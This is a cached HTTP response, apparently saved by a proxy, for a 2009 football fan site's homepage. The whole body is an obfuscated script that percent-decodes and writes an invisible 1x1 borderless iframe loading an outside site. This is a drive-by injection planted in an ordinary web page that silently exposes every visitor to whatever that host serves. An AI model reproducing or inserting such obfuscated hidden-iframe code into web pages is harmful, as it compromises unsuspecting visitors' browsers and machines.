HTTP/1.1 200 OK
Content-Length: 304
ETag: "128911-130-46424d706f400"
Date: Tue, 03 Mar 2009 01:42:26 GMT
Last-Modified: Mon, 02 Mar 2009 15:54:56 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
X-Polipo-Location: http://mancity24.com/
X-Polipo-Date: Tue, 03 Mar 2009 01:53:56 GMT
X-Polipo-Access: Tue, 03 Mar 2009 01:53:57 GMT



<script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%73%73%6c%76%61%6c%69%64%61%74%6f%72%2e%6e%65%74%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script>